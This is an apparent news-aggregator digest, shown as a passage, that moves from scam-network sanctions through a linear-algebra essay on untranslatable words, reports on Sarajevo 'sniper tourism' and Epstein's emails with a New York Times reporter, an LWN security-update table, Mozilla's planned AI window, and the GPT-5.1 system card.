Under the sanctions, the assets of designated entities and individuals are now blocked, and U.S. individuals and organizations are barred from dealing with them, which may also expose them to potential sanctions.

Earlier this year, OFAC also sanctioned the Karen National Army (KNA) and twelve other companies based in Cambodia and Burma (and associated individuals) for their involvement in human trafficking and cyber scams.

In October, the U.S. Department of Justice seized $15 billion in bitcoin from the leader of Prince Group, a criminal organization that stole billions from Americans through cryptocurrency investment scams.

"A U.S. government estimate indicated that Americans lost at least $10 billion to Southeast Asia-based scam operations in 2024, a 66 percent increase over the prior year, with scams like those perpetrated by Prince Group TCO being particularly significant," OFAC noted.


Linear Algebra Explains Why Some Words Are Effectively Untranslatable

Hacker News
aethermug.com
2025-11-14 14:46:27
Comments...
Original Article

A part of me still hasn't recovered from learning that some people believe there is no such thing as an untranslatable word. I've written about why I disagree before , but that explanation didn't satisfy me completely. There was a stronger argument to be made, I thought, but I couldn't put it into words. Now I remember, though: you need to see language as (a little bit) like math. Call me crazy, but I think that language translation is like a change of basis in linear algebra.

Me making weird connections like this might simply be an occupational hazard. Both my PhD research and my first job had to do with controlling the position and orientation of spacecraft and rocks in space, which means that I spent years juggling vectors, matrix multiplications, and reference frames almost daily. Still, I think it is simple enough to be understood by anyone, so hear me out.

( You might remember linear algebra from high school. It's that subfield where you write about stuff like this:

M = \begin{bmatrix} 1 & 0 & 0 \\ 2 & 1 & 0 \\ 3 & 3 & 1 \end{bmatrix} \begin{pmatrix} x \\ y \end{pmatrix}

If the mere sight of the above is like a punch in the face for you, don't worry. I'm not going to math you to death in what follows. I will only remind you of a tiny basic part of it that I think relates to languages.)

During those same mathematical days, I was also learning Japanese. The language fascinated me for many reasons, like its beautiful dissociation between written and spoken words and its many unique quirks , but I was also struck early on by something a bit more meta: how hard it is to translate things to and from it.

These two concurrent interests made it hard for me not to see a connection. For almost a decade now, I've held it in a corner of my mind without telling anyone, perhaps because I thought it would be seen as too outrageous, but hey! Now LLMs are popular and they literally handle words and concepts as vectors with linear algebra operations, so maybe my analogy isn't that out there. Let me give it a try.

The Case of Vectors

Contrary to popular belief, a vector is not "a list of numbers" but an abstract object with no predefined way to express it.

You can think of vectors as arrows floating in space. No numbers involved.

But a vector is not very useful in this abstract state. We need a way to write it down so that we can manipulate it with algebra and communicate it to others. We do this by choosing a frame of reference—or, more accurately, a set of vectors to use as "basis" to quantify all others.

In the 2D case like this, if you set two vectors (e1 and e2) as the basis and decide that they have length 1, then you can find the coordinates of all other vectors based on their comparison to that basis. The basis vectors act as measuring sticks.

This is where numbers come into play. By projecting the vectors against the basis vectors, you can assign them lists of numbers (two numbers each, in this two-dimensional case):

\mathbf{a} = \begin{pmatrix} 0.5 \\ 0.7 \end{pmatrix}, \quad \mathbf{b} = \begin{pmatrix} 0.8 \\ 0.3 \end{pmatrix}

Those numbers are the coordinates of the vectors in that basis. For instance, the vector a can be read as "half as long as the e1 vector along the direction of e1, and 0.7 times as long as the e2 vector along the direction of e2."

The important thing I want to convey here (and the last mathy thing to remember) is that if you were to choose a different basis, the same vector would have different coordinates.

Same vectors, different basis: the numbers are different.

In this new basis, the two vectors are written as:

\mathbf{a} = \begin{pmatrix} 0.8 \\ 0.2 \end{pmatrix}, \quad \mathbf{b} = \begin{pmatrix} 0.8 \\ -0.2 \end{pmatrix}

In short, change the basis (e.g. from "e1 & e2" to "u1 & u2") and the same abstract object (vector) will be represented with different numbers. You can do all the same operations with them, like changing the vector's length and direction, calculating the angle between the vectors, and so on, and you'll get the same results in both bases, because they are operations on the same objects. The choice of basis is merely cosmetic from this point of view.
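
To make the mechanics concrete, here is a small worked example with an invented change-of-basis matrix (not the u1 & u2 of the figures, so the numbers differ from the ones above). If the new basis vectors, written in the old basis, form the columns of a matrix P, then coordinates transform through the inverse of P:

P = \begin{bmatrix} 1 & 1 \\ 1 & -1 \end{bmatrix}, \qquad [\mathbf{a}]_{\text{new}} = P^{-1}\,[\mathbf{a}]_{\text{old}} = \tfrac{1}{2}\begin{bmatrix} 1 & 1 \\ 1 & -1 \end{bmatrix} \begin{pmatrix} 0.5 \\ 0.7 \end{pmatrix} = \begin{pmatrix} 0.6 \\ -0.1 \end{pmatrix}

Same arrow, different measuring sticks, different numbers.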

The Case of Language

Now let's turn to language and see the parallel.

Contrary to popular belief, a concept is not a word or a group of words but an abstract object in your mind.

A concept I have in mind now, shown as a drawing rather than words.

But a concept is not very useful in this abstract state. We need a way to write it down so that we can manipulate it with grammar and communicate it to others. We do this by choosing a language that is shared with the receiver of the message.

For the concept in my head right now, and choosing the English language to represent it, you get this:

"Going to Tokyo"

This is where words come into play. By projecting the abstract idea onto the standard English vocabulary and grammar, you can assign it a list of words:

💭 = \begin{pmatrix} \text{Going} \\ \text{to} \\ \text{Tokyo} \end{pmatrix}

Those words are the equivalent of the coordinates of the vectors in linear algebra. The way I just wrote it is not accurate, though, because it makes it look as if English only had 3 dimensions (3 words), just like the 2-element vectors were 2-dimensional. English actually has hundreds of thousands of words, so we would need a vector that long to fully represent it, with blank spaces for all the words that aren't involved in this case.

💭 = \begin{pmatrix} \text{Going} \\ \text{to} \\ \text{Tokyo} \\ \emptyset \\ \emptyset \\ \emptyset \\ \vdots \end{pmatrix}

The English language offers its speakers many other words, like camel, frolic, and or, but in this case none of them was necessary to express the idea that was in my mind, so they remain empty (∅) and absent from my utterance of "going to Tokyo".



Of course, similar to vectors with bases, you can express the same concept in a different language. If I chose Italian as the "basis", you'd get:

"Andare a Tokio"

The concept is the same, but now its representation (its "word coordinates") is different:

💭 = \begin{pmatrix} \text{Andare} \\ \text{a} \\ \text{Tokio} \\ \emptyset \\ \emptyset \\ \emptyset \\ \vdots \end{pmatrix}

You can, in theory, say those two different sequences of sounds in those two languages, and obtain the same effect in the mind of the receiver. The only requirement is that all people involved know both languages.

Cosmetics Matter

Alright, the parallel seems plain enough. Sadly, expressing all language in that vector-like format would use up a lot of ink and is not really practical for everyday use. (LLMs kind of achieve that feat, but in a more convoluted and definitely not human-readable way.)

Why do I think it is interesting, then? Because "untranslatable" words exist.

The words that people sometimes call "untranslatable" are terms that have a clear and widely understood meaning in one language, but no equivalent in another one. I gave some examples from Japanese before, and the web is awash with blog posts enumerating curious words like that from many other languages. The key takeaway is that what takes a single word in Language 1 can only be expressed with some accuracy in Language 2 by using many words to explain it in all of its facets.

I wrote that the choice of basis in linear algebra is "cosmetic", because the result of an operation on vectors does not change depending on the basis. But that is only the ideal, mathematical way to look at it. We humans are not so ideal. We are weak and fallible and sometimes we even stink.

Which vector representation do you like better between these two?

\mathbf{v} = \begin{pmatrix} 0.498213 \\ 0.731212 \end{pmatrix}

or

\mathbf{v} = \begin{pmatrix} 1 \\ 0 \end{pmatrix}

Both represent the same vector under different bases, because I chose a basis that has the vector v itself as one of the basis vectors. Here is what the two cases look like graphically:

Left: a vector in a generic basis, with both components not zero. Right: the same vector in a basis where it is itself one of the basis vectors. In this case, the coordinates are 1 on the first component e1 (it is "one times" itself) and 0 on the other (there is "nothing to project" on it).

In theory, both representations are exactly equivalent to each other. A computer wouldn't have any preference. But the second representation, the clean one with a simple one and zero, is not only easier for a person to remember and grasp, but also easier to handle mathematically. Things simplify easily with it: everything multiplied by zero vanishes, and multiplications by one change nothing. The calculations proceed faster and with fewer errors.

This means that, at least for our feeble organic minds, the choice of basis does matter.

The same holds for language. A concept that took several words in English...

💭 = \begin{pmatrix} \text{Going} \\ \text{to} \\ \text{Tokyo} \\ \emptyset \\ \emptyset \\ \emptyset \\ \vdots \end{pmatrix}

in Japanese is a single word: joukyou (上京)

💭 = \begin{pmatrix} \text{上京} \\ \emptyset \\ \emptyset \\ \emptyset \\ \vdots \end{pmatrix}

Looking at it in the other direction, a native word in one language is like one of its "basis vectors"—simple and straightforward—but the underlying concept might need to be "spread out" onto several words when applying a different language (i.e. "basis").

Arguably, having a compact word makes it easier not only to express the concept, but also to think about it. This is the Sapir-Whorf debate, but I'll leave that for another day. Instead, I want to show you what this means for untranslatability, because there are people who vehemently deny that untranslatable words exist.

Losing in Translation

I think there are two ways in which this analogy makes it quite obvious that "practical untranslatability" is a thing.

First, communication is costly, and we don't have infinite time and space to put in all the words that are needed. Even if the word could in theory be explained in the other language, usually it's not worth it.

For example, the Japanese term mono no aware (物の哀れ) could be rather accurately translated as

a gentle, poignant sadness or pathos felt in response to the transient nature of all things, a deep awareness of their impermanence that evokes a subtle, bittersweet sorrow and a profound, quiet empathy for their passing.

In a dictionary, perhaps that's okay. But a dictionary is not translation. Translation is about conveying the meaning of full texts, and you can't do that kind of multi-line expansion for every word.

And so the translator simplifies it to the gist, e.g. as the pathos of all things . This conveys the majority of the meaning and it is usually enough, but it does lose a lot in the process.

This is exactly analogous to the data analysis technique called Principal Component Analysis (PCA), where one simplifies a vector by picking only its largest coordinates and disregarding all others. This means choosing a subset of the basis vectors that are more closely aligned with the vectors of interest, and ignoring the existence of the other basis vectors, effectively reducing the dimensions of the data. Translators use a version of PCA every time they (begrudgingly) accept to leave the finer nuances of a concept unsaid for the sake of space.
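
As a toy numeric version of that move (a simplification of full PCA, which also chooses the directions along which the data varies most), keeping only the dominant coordinate of

\mathbf{v} = \begin{pmatrix} 3.1 \\ 0.2 \\ -0.1 \end{pmatrix} \approx \begin{pmatrix} 3.1 \\ 0 \\ 0 \end{pmatrix} = 3.1\,\mathbf{e_1}

throws away the small components, much like "the pathos of all things" throws away the finer shades of mono no aware.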

But, even assuming you do have time to explicate, using many more words increases the risk of introducing unintended nuances that come bundled with those extra words. This is like doing PCA but selecting inappropriate basis vectors, which introduce lots of small errors in the calculation of the vector's coordinates. Is "sorrow" too emotionally charged in that long translation of mono no aware ? Does the use of "passing" unnecessarily remind English speakers of people dying?

You eventually hit diminishing returns: using more words confuses the reader instead of clarifying things further.



The second problem with translation is precision. Even if you can use many words, and even if none of those are misleading, words are still finite in number. Unlike ideal numerical coordinates, which can take any value down to the finest detail, you only have a small selection of words to convey a given bit of meaning.

Suppose you realize that the word "subtle" is not accurate enough in the "...evokes a subtle, bittersweet" part of the translation above. Maybe you do want to convey subtlety, but feel that the simple word "subtle" feels too strong in this case. You might try to soften it with an adverb, like "somewhat subtle" or "slightly subtle", but there aren't many other options out there. What if none of them is perfect for your current needs?

In this sense, language is "quantized": you can jump from one level of intensity of some meaning to the next, but you can't express anything in between.

This is a problem shared by all computers. Unlike ideal numbers, the numbers in a processor necessarily have a finite number of decimal places. So when you want to work with the ideal vector

\mathbf{v} = \begin{pmatrix} -12.21983714303 \\ 0.6124152102345 \\ 3.0280184181084 \\ 0.10000003 \end{pmatrix}

the storage limitations of your computer might mean that you have to content yourself with this truncated version:

\mathbf{v} = \begin{pmatrix} -12.219 \\ 0.61241 \\ 3.0280 \\ 0.1 \end{pmatrix}

(Modern computers can usually handle many more digits than that, but you get the idea.)

Graphically, it looks something like this:

Left: An ideal vector. Right: how that vector might be stored if the smallest increment that the computer can store is the separation between the grid lines. This is a loss of accuracy.

(Incidentally, AI engineers sometimes intentionally quantize large language models to make them take up less memory, but this tends to make them dumber, because they lose nuance.)

With language, like with computers, we're forced to "lower the resolution" of our concepts whenever we put them into words. This happens twice in translated text: once when the author first writes down their thoughts, then once more when the translator transports that already-degraded concept into a different language with different "quantization steps".

Between the Lines

I hope these rather unorthodox leaps between linguistics and mathematics helped make it almost obvious that some words and ideas are untranslatable in practice . I also hope you don't take the analogy too seriously, because it won't go much further than this. You might be tempted to begin talking about "word matrices" and whatnot, but I doubt it would help clarify things. That kind of advanced linear algebra with concepts might work for LLMs, but it doesn't seem to map to anything intelligible for a human being, not to mention make you any wiser.

Besides, language has something going for it that doesn't seem to have a mathematical equivalent: what does it mean to "read between the lines"?

It's hard to pin down, but I think it has to do with the structure and context of the words communicating something that is not contained in any of the words themselves. Perhaps it is the clever use of those "negligible coordinates"—the fringe nuances—of words scattered around the text to produce a collective effect on the reader.

A good translator might not be able to exactly translate a given word or sentence, but they might be able to "write between the lines" so that it doesn't matter very much. ●

Cover image:

Image by vackground.com, Unsplash

What Comes After Science?

Hacker News
www.science.org
2025-11-14 14:32:49
Comments...

Wealthy foreigners 'paid for chance to shoot civilians in Sarajevo'

Hacker News
www.thetimes.com
2025-11-14 14:32:11
Comments...
Original Article

Wealthy foreign gun enthusiasts paid Bosnian Serb forces for the chance to shoot residents of Sarajevo during the siege of the city during the 1990s, according to claims being investigated by Italian magistrates.

The investigation was prompted by new evidence that “weekend snipers” paid handsomely to line the hills around Sarajevo and join in the Bosnian Serb siege, which killed more than 11,500 people between 1992 and 1996 during the Balkan Wars.

The investigation into the alleged “human safari” in Sarajevo has been opened after years of research by the Italian writer Ezio Gavazzeni, who said a key source was a former Bosnian intelligence officer.

“What I learnt is that Bosnian intelligence warned the local office of the Italian secret service … about the presence of at least five Italians who were taken to the hills above Sarajevo to shoot civilians,” he told the Italian daily La Repubblica.

Gavazzeni started investigating after watching the 2022 documentary Sarajevo Safari , by the Slovenian film-maker Miran Zupanic. The film quoted an unnamed American former spy saying that he had seen visitors paying to shoot civilians. Serbian veterans have denied the claims.

Although there are allegations that snipers arrived from around Europe, Gavazzeni focused on reports of Italians gathering in Trieste before they were escorted to Sarajevo.

“One of the Italian snipers identified to SISMI [the Italian secret service] in 1993 was from Milan, and the owner of a private clinic specialising in cosmetic surgery,” he said. “We are talking about wealthy people, entrepreneurs with a reputation, who during the siege of Sarajevo paid to be able to kill helpless civilians.”

His job is to keep Bosnia peaceful — now he must take on Putin too

After their trips to Sarajevo , he said, “they returned to their respectable lives”. He added that the snipers proved “the indifference of evil — becoming God and remaining unpunished”.

As Milan magistrates seek to identify the Italian snipers, Gavazzeni said he hoped to get the secret service documents about them. “I would really like to read them. I hope they haven’t vanished — it would be very serious.”

The Bosnian consul in Milan, Dag Dumrukcic, told La Repubblica that the Bosnian government would offer “total collaboration” to the magistrates. “We are impatient to discover the truth about such a cruel matter in order to close a chapter of history. I am in possession of certain information I will be sharing with the investigators,” he said.

Epstein Gave NY Times Journalist Tips About Trump. Why Did They Never Get Reported?

Intercept
theintercept.com
2025-11-14 14:30:04
Exchanges about Trump between a reporter and Epstein raise questions about what the New York Times knew and when. The post Epstein Gave NY Times Journalist Tips About Trump. Why Did They Never Get Reported? appeared first on The Intercept....
Original Article

The trove of documents from a House investigation dumped online Wednesday reveal explosive new details about how the late, disgraced financier Jeffrey Epstein wielded influence with prominent and powerful people across the political spectrum.

Epstein’s influential friends, however, weren’t all household names. The documents also reveal details of Epstein’s unusually close relationships with scientists, academics, and philanthropists — and how he had a cozy arrangement with members of the media who got juicy tips from Epstein and did little critical work about him.

One reporter with whom Epstein connected frequently was Landon Thomas Jr., a financial journalist at the New York Times. Thomas exchanged dozens of emails with Epstein between 2015 and 2018, years after the financier’s conviction for soliciting a minor.

Epstein fed information to Thomas about Donald Trump’s allegedly lecherous behavior.

In the emails, Thomas tipped off Epstein about inquiries by other reporters and claimed to have vouched for Epstein, whom he said he called “one hell of a guy.” In one exchange, Thomas coached Epstein on how to repair his reputation.

The relationship was a two-way street. Epstein, who died in a Manhattan federal jail in 2019 awaiting trial on charges of sex trafficking, was reportedly a valued source for Thomas. In the emails released Wednesday, one of the topics on which Epstein fed information to Thomas was Donald Trump’s allegedly lecherous behavior. In the exchanges — through his trademark style of lowercase letters and abundant typos — Epstein alludes to Trump’s predilection for young women.

“read the [BuzzFeed story] re my airplane logs and hawain tropic contest,” Epstein wrote in one email on December 8, 2015, alluding to Trump’s frequent travel on the financier’s private plane. “have them ask my houseman about donad almost walking through the door leaving his nose print on the glass as young women were swimming in the pool and he was so focused he walked straight into the door.”

No reply or follow-up from Thomas appeared in the documents released Wednesday.

On one occasion, Thomas attempted to convince Epstein to speak out about Trump. Thomas had reportedly told his editors he solicited information from Epstein but would not write about Epstein himself. In the newly released email exchange, Thomas offered to pass any information Epstein had about Trump on to other journalists.

“I would not do it myself, but would pass on to a political reporter.”

“I am serious man — for the good of the nation why not try to get some of this out there,” Thomas wrote in an exchange the same day. “I would not do it myself, but would pass on to a political reporter.”

Epstein deflected, sending a link to a story about a Norwegian heiress.

“my 20 year old girlfriend in 93„ that after two years i gave to donald,” Epstein replied.

“Amazing!” Thomas wrote back. “When did you last talk to him?”

Like the other exchange, the message is cryptic and no follow-up was recorded in the files released Wednesday to provide context. The Norwegian heiress has previously been linked to both Trump and Epstein , though she has denied being romantically involved with Epstein. Epstein’s claim that he “gave” the heiress to Trump had not previously surfaced.

Little Came to Light

In total, the exchanges about Trump between Thomas and Epstein amount to a series of tips about the president’s behavior. And these tips came from a known associate of the president, a convicted pedophile. Little of the information given to Thomas, however, ever saw the light of day — not in Thomas’s reporting, not in the New York Times, and not in any other outlets. The details are only now emerging with the release of Thomas’s cozy emails with Epstein.

“It would be useful for readers who have become aware of this to know more from the Times about who knew what, when,” said Margaret Sullivan, a media critic and a former public editor at The New York Times. “I think it’s really important for reporters to have their main constituency in mind, and that is the public.”

“Reporters have sources and some sources are unsavory or worse. But it’s really important to have the public interest at heart,” Sullivan said.

The Intercept made multiple attempts to contact Thomas at an address listed under his name, but was unable to speak with him for comment. In an interview with the Times on Wednesday, Thomas referred to Epstein as a “longstanding and very productive source.”

Danielle Rhoades Ha, a spokesperson for the New York Times, declined to respond to questions on the tips about Trump passed from Epstein to Thomas.

The White House said in a statement that the Epstein emails about Trump were a distraction.

“These emails prove literally nothing,” White House spokesperson Abigail Jackson told The Intercept. “Liberal outlets are desperately trying to use this Democrat distraction to talk about anything other than Democrats getting utterly defeated by President Trump in the shutdown fight. We won’t be distracted.”

Wednesday’s dump came amid a monthslong furor over the so-called “Epstein Files,” the moniker for documents held by the government that could shed further light on the late financier and pedophile.

Epstein’s criminal activities, close ties to the rich and powerful, and mysterious death — which was ruled a suicide — have given rise to investigations, conspiracy theories , and a raft of memes. Despite his personal ties to Epstein, Trump and his supporters brandished Epstein’s relationships with powerful Democrats as a political cudgel.

Now, the administration’s failure to provide full transparency on the case has become a political liability for the president, fueling disaffection among some of his staunchest supporters. The attention on the case triggered an investigation by the House Oversight Committee, which released the trove of emails on Wednesday in two batches: a small one from the Democrats, followed by a massive dump by Republicans.

If the GOP was hoping to extinguish the controversy surrounding Epstein, it may have doused the fire with gasoline instead — and the newly revealed exchanges between Thomas and Epstein are fanning the flames.

“Juicy Info”

When Trump launched his bid for the White House in 2015, his past relationship with Epstein — the men were even neighbors in Palm Beach, Florida — brought fresh scrutiny. One of the focuses was Thomas’s 2002 New York Magazine profile of Epstein, the first recorded interaction between the journalist and the pedophile.

The New York Magazine story is written in a glamorous, gossipy style that cast Epstein as an “ international moneyman of mystery ,” and is held up by Trump’s critics as evidence that the president knew a thing or two about Epstein’s obsession with underage girls. The innuendo flowed from a now-infamous quote where Trump spoke winkingly of Epstein’s predilection for younger women.

“I’ve known Jeff for fifteen years. Terrific guy,” Thomas quoted Trump as saying. “He’s a lot of fun to be with. It is even said that he likes beautiful women as much as I do, and many of them are on the younger side.”

Citing the future president’s “terrific guy” quote, Thomas wrote in a December 2015 email that he was fielding inquiries about Epstein and Trump.

“Now everyone coming to me thinking I have juicy info on you and Trump,” Thomas wrote. “Because of this.”

Two minutes later, Epstein replied.

“would you like photso of donald and girls in bikinis in my kitchen”

“would you like photso of donald and girls in bikinis in my kitchen,” he asked.

“Yes!!!” Thomas wrote back.

Epstein continued the exchange without following through on his offer.

More than a year later, Thomas was apparently still fielding questions about Epstein, this time from John Connolly, the former New York cop-turned-journalist who published a book on Epstein in 2017. On June 1, 2016, Thomas emailed Epstein to tip him off about the fresh round of questions.

“Keep getting calls from that guy doing a book on you — John Connolly. He seems very interested in your relationship with the news media,” Thomas wrote.

According to Thomas, Connolly had doubts about the veracity of Trump’s “terrific guy” quote from 2002.

“One oddity: he said he had been told that that quote from Trump about you in the original NY Mag story had been manufactured ie, that I did not actually speak to Donald,” Thomas wrote. “Which is bull shit of course.”

Later in the thread, Thomas asked Epstein if he too had been questioned about his relationship to the GOP presidential hopeful.

“are you still getting calls from reporters re Trump?” Thomas asked.

“everyone except the NYT it seems :)” Epstein replied.

“How Are You Holding Up?”

Thomas’s relationship with Epstein helped precipitate the journalist’s downfall at the New York Times, according to NPR’s 2019 investigation into the pedophile financier’s relationship to the press. According to the story, Thomas had been asked to interview Epstein for the newspaper in 2018 and disclosed to his editors a friendship with Epstein — including Thomas’s solicitation of a $30,000 donation for a local uptown New York charity.

Thomas told his editors, according to NPR, that he pumped Epstein for information but did not report on him — though on several occasions in past years Thomas had. Thomas was barred from professional contact with Epstein, NPR reported, and within six months he was gone from the New York Times.

Rhoades Ha, the Times spokesperson, said Thomas had left the paper after ethical lapses were uncovered.

“Landon Thomas Jr. has not worked at The Times since early 2019,” she wrote in an email to The Intercept on Wednesday, “after editors discovered his failure to abide by our ethical standards.”

“You have moved on! People don’t know that and cant accept that unless you say as much.”

In 2008, on the eve of Epstein turning himself in to Florida authorities, Thomas wrote one of his New York Times stories about the financier. Thomas traveled to Epstein’s now-notorious Caribbean island lair, Little Saint James. The story, critics said, soft-pedaled the offenses Epstein had pleaded guilty to, largely framing the charges around soliciting sex work rather than the alleged child victims, whose stories had by then become well known thanks to ongoing legal cases.

After his 2008 plea — now widely panned as a sweetheart deal by a Florida prosecutor who would later become a political appointee in Trump’s first administration — Epstein led a comparatively low-profile life, even as he maneuvered behind the scenes to connect powerful players on a global stage.

The emails in Wednesday’s dump from the House don’t include any conversations between Thomas and Epstein until January 2015, when Thomas reached out to check up on Epstein.

“How are you holding up?” Thomas wrote in the subject line of an email sent on January 16.

It’s unclear what prompted the question, but it came just after a judge had heard arguments in Manhattan federal court over whether to unseal documents from the 2008 plea deal and allegations had emerged recently linking Epstein and Britain’s Prince Andrew to horrific acts of sexual violence.

If Epstein was worried, however, he didn’t show it.

“very well, my reputation has admittedly taken a hit,” Epstein replied. “however, again, more calls re currency than i can handle.”

Epstein proceeded to defend his conduct and cast aspersions on the character and motives of his accusers.

Thomas replied with some advice.

“I think the big issue is separating yourself from Andrew,” Thomas wrote. “I mean I can see why a statement might help in some way — but its Andrew (not clinton and the rest) that is keeping the story alive.”

“Until you are able to come forward and address that the story lives on,” Thomas continued. “You have moved on! People don’t know that and cant accept that unless you say as much.”

Thomas then asked Epstein for his thoughts on global currencies.

5 Films to Watch at This Year's DOC NYC

hellgate
hellgatenyc.com
2025-11-14 14:15:50
Docs for your weekend and some links to start your day....
Original Article

A brand-new Hell Gate Podcast will be dropping later today! You won't want to miss it. Listen and subscribe here , or wherever you get your podcasts.




The weather this weekend will be moody and serious, perfect for a dreamy, gloomy long walk through Lower Manhattan, your hands in your pockets and your collar fastened to your ears, as you make your way to a documentary screening (and maybe a $20 dinner after?).

If that's your ideal day, you're in luck: DOC NYC , which bills itself as "America's largest documentary festival," is back this year at three venues across Lower Manhattan (IFC Center, Village East, and the SVA Theater), running from this week through the end of the month.

At DOC NYC, you can see a bunch of documentaries that might never make it to theaters or streaming. Here are five docs (most with some connection to New York City) that we're not going to miss this year.


Security updates for Friday

Linux Weekly News
lwn.net
2025-11-14 14:09:15
Security updates have been issued by Debian (keystone and lxd), Fedora (docker-buildkit, firefox, gh, gitleaks, lasso, runc, and seamonkey), Mageia (perl-Authen-SASL, perl-Cpanel-JSON-XS, perl-Crypt-OpenSSL-RSA, perl-JSON-XS, python-flask-cors, python-py, python-setuptools, and ruby), Oracle (java-1...
Original Article
Dist. ID Release Package Date
Debian DSA-6056-1 stable keystone 2025-11-13
Debian DSA-6057-1 stable lxd 2025-11-13
Fedora FEDORA-2025-122a933cad F41 docker-buildkit 2025-11-14
Fedora FEDORA-2025-ac008831d6 F42 docker-buildkit 2025-11-14
Fedora FEDORA-2025-d1dade0612 F43 docker-buildkit 2025-11-14
Fedora FEDORA-2025-457ee8a964 F42 firefox 2025-11-14
Fedora FEDORA-2025-6981d97f47 F43 gh 2025-11-14
Fedora FEDORA-2025-a10fad6506 F42 gitleaks 2025-11-14
Fedora FEDORA-2025-7e6204e34e F41 lasso 2025-11-14
Fedora FEDORA-2025-3edcd991a4 F42 lasso 2025-11-14
Fedora FEDORA-2025-6924245627 F41 runc 2025-11-14
Fedora FEDORA-2025-ef192f5d10 F42 runc 2025-11-14
Fedora FEDORA-2025-ebd4913540 F43 runc 2025-11-14
Fedora FEDORA-2025-e49d776723 F41 seamonkey 2025-11-14
Fedora FEDORA-2025-4eaa870223 F42 seamonkey 2025-11-14
Fedora FEDORA-2025-5f24a0c1ba F43 seamonkey 2025-11-14
Mageia MGASA-2025-0285 9 perl-Authen-SASL 2025-11-13
Mageia MGASA-2025-0284 9 perl-Cpanel-JSON-XS 2025-11-13
Mageia MGASA-2025-0287 9 perl-Crypt-OpenSSL-RSA 2025-11-13
Mageia MGASA-2025-0283 9 perl-JSON-XS 2025-11-13
Mageia MGASA-2025-0286 9 python-flask-cors 2025-11-13
Mageia MGASA-2025-0289 9 python-py 2025-11-14
Mageia MGASA-2025-0288 9 python-setuptools 2025-11-14
Mageia MGASA-2025-0290 9 ruby 2025-11-14
Oracle ELSA-2025-18814 OL7 java-1.8.0-openjdk 2025-11-13
SUSE SUSE-SU-2025:4096-1 MP4.3 SLE15 SES7.1 oS15.3 oS15.4 oS15.5 oS15.6 binutils 2025-11-14
SUSE SUSE-SU-2025:4091-1 oS15.6 cargo-packaging, rust-bindgen 2025-11-13
SUSE openSUSE-SU-2025:0430-1 osB15 chromium 2025-11-14
SUSE openSUSE-SU-2025:15729-1 TW go-sendxmpp 2025-11-13
SUSE openSUSE-SU-2025:15730-1 TW helm 2025-11-13
SUSE SUSE-SU-2025:4090-1 MP4.3 SLE15 SES7.1 lasso 2025-11-13
SUSE SUSE-SU-2025:4094-1 SLE12 lasso 2025-11-14
SUSE SUSE-SU-2025:4104-1 SLE12 libxml2 2025-11-14
SUSE SUSE-SU-2025:4097-1 SLE12 openssh 2025-11-14
SUSE SUSE-SU-2025:4098-1 SLE12 openssh8.4 2025-11-14
SUSE SUSE-SU-2025:4100-1 SLE15 oS15.6 python-Django 2025-11-14
SUSE openSUSE-SU-2025:15732-1 TW python-Scrapy-doc 2025-11-13
SUSE openSUSE-SU-2025:15731-1 TW python311-Brotli 2025-11-13
SUSE SUSE-SU-2025:4099-1 SLE12 squid 2025-11-14
SUSE SUSE-SU-2025:4103-1 SLE15 oS15.6 tomcat10 2025-11-14
SUSE openSUSE-SU-2025:15733-1 TW weblate 2025-11-13
Ubuntu USN-7861-3 22.04 24.04 linux-nvidia-6.8, linux-oracle, linux-oracle-6.8 2025-11-13
Ubuntu USN-7862-3 22.04 linux-xilinx-zynqmp 2025-11-13

I think nobody wants AI in Firefox, Mozilla

Hacker News
manualdousuario.net
2025-11-14 14:05:00
Comments...
Original Article

Mozilla is developing a built‑in AI assistant for Firefox that will be offered as a third browsing mode alongside Normal and Private tabs. They’re calling it “Window AI.”

Details are still scarce. Based on Mozilla’s official announcement on Thursday (13th), it looks like a deeper implementation than the existing sidebar that gives access to third‑party chatbots (ChatGPT, Gemini, Copilot, etc.). The post stresses the feature will be opt-in and that the user “is in control.”

There’s a waitlist to try the feature and a Mozilla forum thread inviting people to “help shape” the initiative.

Illustration showing Firefox’s three modes/windows: normal, “Window AI” and private window.
Image: Mozilla.

It’s safe to say that the people who volunteered to “shape” the initiative want it dead and buried. Of the 52 responses at the time of writing, all of them rejected the idea and asked Mozilla to stop shoving AI features into Firefox.

I don’t know whether the negative reactions reflect the majority of Firefox users or are just a noisy minority. Mozilla, after all, likely has a clearer view of the whole user base.

What strikes me as odd is Mozilla’s decision to position Firefox as just another AI‑enabled web browser, picking a fight with big tech companies and better‑funded startups whose users are less hostile to (and sometimes enthusiastic about) adding AI to web browsing.

Mozilla seems to be trying to wedge itself between those who reject AI and those who want generative‑AI features in the browser — trying to please everyone — as this excerpt from the post shows:

We see a lot of promise in AI browser features making your online experience smoother, more helpful, and free from the everyday disruptions that break your flow. But browsers made by AI companies ask you to make a hard choice — either use AI all the time or don’t use it at all.

We’re focused on making the best browser, which means recognizing that everyone has different needs. For some, AI is part of everyday life. For others, it’s useful only occasionally. And many are simply curious about what it can offer, but unsure where to start.

Regardless of your choice, with Firefox, you’re in control.

Those unhappy have another option: use an AI‑free Firefox fork such as LibreWolf , Waterfox , or Zen Browser .

GPT-5.1 Instant and GPT-5.1 Thinking System Card Addendum

Simon Willison
simonwillison.net
2025-11-14 13:46:23
GPT-5.1 Instant and GPT-5.1 Thinking System Card Addendum I was confused about whether the new "adaptive thinking" feature of GPT-5.1 meant they were moving away from the "router" mechanism where GPT-5 in ChatGPT automatically selected a model for you. This page addresses that, emphasis mine: GPT‑5...
Original Article

GPT-5.1 Instant and GPT-5.1 Thinking System Card Addendum . I was confused about whether the new "adaptive thinking" feature of GPT-5.1 meant they were moving away from the "router" mechanism where GPT-5 in ChatGPT automatically selected a model for you.

This page addresses that, emphasis mine:

GPT‑5.1 Instant is more conversational than our earlier chat model, with improved instruction following and an adaptive reasoning capability that lets it decide when to think before responding. GPT‑5.1 Thinking adapts thinking time more precisely to each question. GPT‑5.1 Auto will continue to route each query to the model best suited for it , so that in most cases, the user does not need to choose a model at all.

So GPT‑5.1 Instant can decide when to think before responding, GPT-5.1 Thinking can decide how hard to think, and GPT-5.1 Auto (not a model you can use via the API) can decide which out of Instant and Thinking a prompt should be routed to.

If anything this feels more confusing than the GPT-5 routing situation!

The system card addendum PDF itself is somewhat frustrating: it shows results on an internal benchmark called "Production Benchmarks", also mentioned in the GPT-5 system card , but with vanishingly little detail about what that tests beyond high level category names like "personal data", "extremism" or "mental health" and "emotional reliance" - those last two both listed as "New evaluations, as introduced in the GPT-5 update on sensitive conversations " - a PDF dated October 27th that I had previously missed.

That document describes the two new categories like so:

